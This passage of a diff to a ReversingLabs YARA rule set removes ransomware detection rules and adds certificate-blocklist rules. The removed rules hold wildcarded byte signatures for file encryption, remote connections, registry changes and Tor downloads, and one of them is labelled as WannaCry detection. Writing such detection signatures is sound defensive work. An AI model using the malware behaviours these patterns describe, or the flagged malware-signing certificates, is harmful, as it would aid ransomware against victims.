-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 59 BE ?? ?? ??
-            ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 FF
-            74 24 ?? FF D7 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 84 C0 8D 84 24 ?? ?? ?? ?? 75 ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? E9 ?? ?? ?? ??
-            6A ?? 50 FF D7 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E9 ?? ?? ?? ?? 8D 4C
-            24 ?? 51 50 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ??
-            ?? 89 5C 24 ?? 33 DB 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 54 24
-            ?? 89 4C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 8D 84 24
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 56 8D 84 24 ?? ?? ?? ?? 50 FF
-            D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 56 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ??
-            ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 6A ?? 59 33 C0 66 89 9C 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB 6A ?? FF
-            74 24 ?? 66 AB 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
-            ?? 57 53 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 0B 44 24 ?? 74 ?? 83 44
-            24 ?? ?? 11 5C 24 ?? EB ?? 89 7C 24 ?? 89 5C 24 ?? BF ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
-            59 50 57 8B 7C 24 ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 47 ?? 8B 44 24 ?? 53
-            89 47 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 57 FF 74 24 ?? C7 47 ?? ?? ?? ?? ?? 88 5C 24
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? 3B FB 89
-            5C 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 8B 74 24 ?? 83 EE ??
-            1B FB 89 74 24 ?? 89 7C 24 ?? 89 5C 24 ?? 33 C0 EB ?? 8B 7C 24 ?? 8B 74 24 ?? 39 74
-            24 ?? 75 ?? 3B C7 75 ?? 8B 44 24 ?? 89 44 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74
-            24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 58 39 44 24 ?? 73 ?? 89 44 24 ?? 39 74 24
-            ?? 75 ?? 33 C0 3B C7 75 ?? 39 5C 24 ?? 7C ?? 7F ?? 83 7C 24 ?? ?? 76 ?? 8B 44 24 ??
-            83 E0 ?? 74 ?? 8B 4C 24 ?? 2B C8 03 C9 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 74 24 ??
-            53 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
-            ?? 50 81 EC ?? ?? ?? ?? 6A ?? 59 8B FC FF B4 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? FF
-            B4 24 ?? ?? ?? ?? F3 A5 8B B4 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ??
-            53 8D 44 24 ?? 50 FF 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 68 ?? ?? ?? ??
-            53 56 74 ?? FF 15 ?? ?? ?? ?? FF 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 33 C0 3B 44 24 ??
-            0F 8C ?? ?? ?? ?? 7F ?? 8B 4C 24 ?? 3B 4C 24 ?? 0F 82 ?? ?? ?? ?? EB ?? C6 44 24 ??
-            ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 74 24 ?? FF 15 ?? ?? ?? ??
-            FF 74 24 ?? 8B 3D ?? ?? ?? ?? FF D7 FF 74 24 ?? FF D7 56 8D 84 24 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 38 5C 24 ?? 8D 84 24
-            ?? ?? ?? ?? 75 ?? 6A ?? FF 74 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 FF 74 24 ?? 68 ?? ??
-            ?? ?? 75 ?? E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF D6 EB ?? E8 ?? ?? ?? ??
-            59 59 B0 ?? EB ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 32 C0 8B 8C 24 ?? ?? ?? ??
-            5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_2 = {
-            55 8D 6C 24 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ??
-            53 56 57 BE ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 56 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ??
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ??
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? 57
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ??
-            6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C3
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50
-            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 59 59 5F 5E 5B 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            59 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B 85 ??
-            ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 83 C5 ?? C9 C3
-        }
-		$remote_connection_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85
-            ?? ?? ?? ?? 50 8B F9 8B F2 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 33 DB 53 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 89 85 ?? ?? ?? ?? 66 C7 85
-            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
-            88 1F 50 88 1E 66 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D
-            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 38 9D ?? ?? ??
-            ?? 59 59 75 ?? 68 ?? ?? ?? ?? C6 07 ?? E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 33 F6 BB ?? ?? ?? ??
-            56 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 53 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ??
-            46 83 FE ?? 59 59 7C ?? EB ?? 53 E8 ?? ?? ?? ?? 59 83 BD ?? ?? ?? ?? ?? 7C ?? C6 07
-            ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 F6 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 66
-            89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 50 FF
-            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 3B C6 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 89 B5 ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 59 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B C8 85 C9
-            89 8D ?? ?? ?? ?? 7D ?? C6 07 ?? 51 E9 ?? ?? ?? ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 33 C0 8D BD ?? ?? ?? ?? 66
-            AB 40 3B C8 89 85 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 47 ?? E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 8B 77 ?? 2B 37
-            8D 46 ?? 50 E8 ?? ?? ?? ?? 59 56 6A ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 07 8B
-            8D ?? ?? ?? ?? 83 C4 ?? 03 C8 51 8B 4F ?? 2B C8 51 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 59 40 50 E8
-            ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? 8B F0 6A ?? 56 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? FF B5 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 56 53 C6 04 06 ??
-            E8 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
-            3B C6 59 59 0F 8C ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 83 F8 ?? 7E ?? 48 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 85 C0 59 59 75 ?? 8B 06 8B 8D ?? ?? ?? ?? 03
-            C8 51 8B 4E ?? 2B C8 51 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            83 C6 ?? FF 8D ?? ?? ?? ?? 75 ?? 33 F6 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ??
-            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 C7 ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 B0 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 50 53 C6
-            01 ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 59 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74
-            ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 53 C6 00 ?? E8 ?? ?? ??
-            ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 00 ?? EB ?? 0F
-            84 ?? ?? ?? ?? C6 07 ?? FF 15 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 83 BD ?? ?? ??
-            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 32 C0 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_and_encrypt_files and $remote_connection_1 and $remote_connection_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Install Sync" and pe.signatures [ i ] . serial == "6a:c6:26:8b:2e:43:1a:2c:13:69:34:6d:17:5d:0e:30" and 1436140800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Wannacry : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WannaCry ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "61734d47-2525-5e3a-94b4-60493dfe2b93"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "b336ff6c-d94e-5715-bb97-6b60cda90911"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WannaCry.yara#L3-L135"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12818-L12834"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fed58b533a9f7c3eb1b3e4f8fbe1f519aab94d1c066ae6937c21876693be0eac"
+		logic_hash = "41dfe37b464d337268a8bb0e23124df7b50ab966038e8ad33bda81a4d86040ca"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WannaCry"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_1 = {
-            A0 ?? ?? ?? ?? 56 57 6A ?? 88 85 ?? ?? ?? ?? 59 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB
-            AA 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88
-            18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85
-            C0 74 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D
-        }
-		$main_2 = {
-            68 ?? ?? ?? ?? 33 DB 50 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 15
-            ?? ?? ?? ?? 83 38 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 00 FF 70 ?? E8 ?? ??
-            ?? ?? 59 85 C0 59 75 ?? 53 E8 ?? ?? ?? ?? 85 C0 59 74 ?? BE ?? ?? ?? ?? 53 8D 85 ??
-            ?? ?? ?? 56 50 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0
-            59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            53 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 68 ?? ?? ?? ?? E8
-        }
-		$main_3 = {
-            83 EC ?? 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7C 24 ?? 33 C0 F3 A5 A4 89 44 24 ??
-            89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 50 50 50 6A ?? 50 88
-            44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 8B F0 6A ?? 51 56
-            FF 15 ?? ?? ?? ?? 8B F8 56 8B 35 ?? ?? ?? ?? 85 FF 75 ?? FF D6 6A ?? FF D6 E8
-        }
-		$start_service_3 = {
-            83 EC ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            38 ?? 7D ?? E8 ?? ?? ?? ?? 83 C4 ?? C3 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 8B F8 85 FF 74 ?? 53 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D
-            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E
-            5B 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 83 C4 ?? C3
-        }
-		$main_4 = {
-            83 EC ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 53 56 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 ??
-            6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E 5B 8D 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 33 C0 5F 83 C4 ?? C2
-        }
-		$main_5 = {
-            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
-            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 3B C3 74 ?? FF 75 ?? 50 E8
-            ?? ?? ?? ?? 59 3B C3 59 74 ?? 68 ?? ?? ?? ?? 50 E8
-        }
-		$main_6 = {
-            FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? C2
-        }
-		$set_reg_key_6 = {
-            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B 2D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 FF 89 7C 24 ?? 85 FF 75 ?? 8D 4C
-            24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? ?? EB ?? 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 85
-            C9 74 ?? 8D 94 24 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF D5 8D BC 24 ?? ?? ?? ?? 83 C9 ??
-            33 C0 F2 AE F7 D1 8D 84 24 ?? ?? ?? ?? 51 8B 4C 24 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
-            51 FF D3 8B 7C 24 ?? 8B F0 F7 DE 1B F6 46 EB ?? 8D 54 24 ?? 8D 8C 24 ?? ?? ?? ?? 52
-            51 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15
-        }
-		$download_tor_6 = {
-            81 EC ?? ?? ?? ?? 53 55 56 57 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A0 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 88 44 24 ?? 33 C0 8D 7C 24 ?? 8B 35 ?? ?? ?? ?? F3 AB 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 66 AB 68 ?? ?? ?? ?? 8D 4C 24 ?? 33 ED 68 ?? ?? ?? ?? 51 89 2D ?? ??
-            ?? ?? 89 2D ?? ?? ?? ?? AA FF D6 8B 1D ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 FF D3 83
-            F8 ?? 0F 85 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84
-            C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 A0 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 84 24 ??
-            ?? ?? ?? 33 C0 8D BC 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 AB 66 AB 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 AA FF D6 83 C4 ?? 8D 94 24 ?? ?? ??
-            ?? 52 FF D3 83 F8 ?? 75 ?? 5F 5E 5D 32 C0 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$main_7 = {
